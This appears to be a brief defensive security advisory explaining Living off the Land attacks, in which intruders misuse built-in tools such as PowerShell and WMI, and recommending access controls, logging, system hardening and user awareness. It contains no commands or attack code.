Living off the Land (LotL) Attacks

FEBRUARY 18TH, 2026

2min read

Copied to clipboard

Living off the Land (LotL) attacks occur when threat actors misuse legitimate tools already present within a system to perform malicious activity. Rather than deploying traditional malware, attackers leverage trusted administrative utilities to blend into normal operations and evade detection.

In 2026, threat actors exploited vulnerabilities in SolarWinds Web Help Desk to gain unauthorised access to systems and installed legitimate administrative and monitoring tools to evade detection.

How LotL Attacks Work

Attackers typically:
1. Gain initial access through phishing, stolen credentials, or exposed services
2. Use built-in tools (e.g., PowerShell, WMI, remote administration utilities)
3. Escalate privileges and move laterally across systems
4. Establish persistence, exfiltrate data, or deploy ransomware

These actions often resemble normal administrative activity, making detection more difficult.

Why It Matters

LotL techniques are frequently observed in ransomware incidents, business email compromise (BEC), insider threats, and advanced persistent threat (APT) campaigns.

Because the activity relies on legitimate system tools, organisations must prioritise visibility, monitoring, and access control rather than attempting to block tools outright.

Risk Factors

Organisations face increased risk if they:
1. Allow excessive administrative privileges
2. Lack of centralised logging and monitoring
3. Do not enforce multi-factor authentication (MFA)
4. Have weak password or credential management practices

Recommended Best Practices

1. Strengthen Access Controls: Enforce multi-factor authentication (MFA), apply least-privilege principles, and regularly review privileged accounts.

2. Enhance Monitoring: Implement centralised logging, monitor administrative tool usage, and establish alerts for unusual behaviour patterns.

3. Harden Systems: Restrict unnecessary administrative utilities, disable unused services, and apply security patches promptly.

4. Promote User Awareness: Conduct regular phishing awareness training and encourage prompt reporting of suspicious activity.

Explore more CIL Advisories

Device Code Phishing: Abusing Legitimate Microsoft 365 Authentication

In device code phishing, threat actors exploit the device code authentication flow to capture authentication tokens, which they then use…

FEBRUARY 25TH, 2026

Reynolds Ransomware: Disables Security Before Encrypting Data

Reynolds is a ransomware threat identified in early 2026. Its key capability is disabling security tools before encrypting files.

FEBRUARY 23RD, 2026

IDOR Vulnerability: A Digit Between Privacy and Exposure

Insecure Direct Object Reference (IDOR) occurs when an application uses a "direct reference" to an internal object (like a database…

FEBRUARY 11TH, 2026

Never miss a CIL Security Advisory

Stay informed with the latest security updates and insights from CIL.

CIL Support